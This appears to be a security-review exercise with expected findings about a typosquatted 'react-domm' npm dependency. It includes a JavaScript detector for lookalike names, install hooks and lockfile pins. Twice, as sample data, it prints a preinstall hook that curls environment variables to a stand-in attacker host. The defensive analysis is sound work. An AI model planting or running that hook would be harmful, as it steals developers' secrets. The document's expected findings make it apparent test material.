Expected Findings
- `react-domm` is a typo of `react-dom` and is not the canonical maintainer.
- Typo'd package declares a `preinstall` script that runs on every install.
- Lockfile pins the typo'd version, so the bad code is reproduced everywhere.
The repo's `package.json` depends on a typo of a popular package, and the typo'd package ships a `preinstall` script that exfiltrates env vars on every developer install.
CWE-829, CWE-1357
Victim repo package.json (note the typo of react-dom):
"dependencies": { "react-domm": "^18.0.0" }
Typo'd package's package.json:
"scripts": { "preinstall": "curl https://attacker.test -d @/proc/self/environ" }
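The three findings above can be checked mechanically. The following is an added example, not part of the original write-up: it flags dependency names within one edit of a well-known package, lists any install-time lifecycle hooks a dependency declares, and confirms whether a package-lock.json (lockfileVersion 2/3 "packages" layout) pins the suspect name. The short known-package list, the sample manifests and the lock file are constructed for this example; a real check would load a maintained list of popular package names.

```javascript
// Added example: offline checks for the typosquat + preinstall pattern.
// KNOWN_PACKAGES is a deliberately tiny list assumed for the example; in
// practice load a larger list of popular npm names.
const KNOWN_PACKAGES = ["react", "react-dom", "lodash", "express", "axios"];

// Lifecycle hooks npm runs automatically for a dependency during `npm install`.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];

// Optimal-string-alignment (Damerau-Levenshtein) distance: insertions,
// deletions, substitutions and adjacent transpositions each cost 1, so
// "react-domm", "raect-dom" and "reactdom" are all one edit from "react-dom".
function editDistance(a, b) {
  const d = Array.from({ length: a.length + 1 }, () => new Array(b.length + 1).fill(0));
  for (let i = 0; i <= a.length; i++) d[i][0] = i;
  for (let j = 0; j <= b.length; j++) d[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost);
      if (i > 1 && j > 1 && a[i - 1] === b[j - 2] && a[i - 2] === b[j - 1]) {
        d[i][j] = Math.min(d[i][j], d[i - 2][j - 2] + 1); // transposition
      }
    }
  }
  return d[a.length][b.length];
}

// Every dependency that is not itself a known package but sits within
// `maxDistance` edits of one: [{ name, lookalikeOf }].
function findTyposquats(manifest, known = KNOWN_PACKAGES, maxDistance = 1) {
  const deps = { ...(manifest.dependencies || {}), ...(manifest.devDependencies || {}) };
  const findings = [];
  for (const name of Object.keys(deps)) {
    if (known.includes(name)) continue;
    for (const candidate of known) {
      if (editDistance(name, candidate) <= maxDistance) {
        findings.push({ name, lookalikeOf: candidate });
        break;
      }
    }
  }
  return findings;
}

// Install-time hooks a package declares, with their commands, so a reviewer
// can see exactly what would run on every `npm install`.
function findInstallScripts(pkgManifest) {
  const scripts = pkgManifest.scripts || {};
  return INSTALL_HOOKS.filter((h) => h in scripts).map((h) => ({ hook: h, command: scripts[h] }));
}

// Version a package-lock.json (v2/v3 "packages" layout) pins for `name`, or
// null if the lock does not contain it.
function lockfilePins(lock, name) {
  const entry = (lock.packages || {})[`node_modules/${name}`];
  return entry ? entry.version : null;
}

// --- constructed sample inputs (not real manifests) ---
const victimManifest = JSON.parse(`{
  "name": "victim-app",
  "dependencies": { "react": "^18.0.0", "react-domm": "^18.0.0" }
}`);

const typosquatManifest = JSON.parse(`{
  "name": "react-domm",
  "version": "18.0.1",
  "scripts": { "preinstall": "curl https://attacker.test -d @/proc/self/environ" }
}`);

const victimLock = JSON.parse(`{
  "lockfileVersion": 3,
  "packages": { "node_modules/react-domm": { "version": "18.0.1" } }
}`);

console.log("typosquats:", findTyposquats(victimManifest));
console.log("install hooks:", findInstallScripts(typosquatManifest));
console.log("lock pins react-domm:", lockfilePins(victimLock, "react-domm"));
```

Run against the sample inputs, `findTyposquats` reports `react-domm` as a lookalike of `react-dom`, `findInstallScripts` surfaces the `preinstall` command, and `lockfilePins` returns the pinned `18.0.1`, which together reproduce the three expected findings. The distance threshold of 1 keeps noise low on short names; raising it for long names is a tuning choice, not something this example decides.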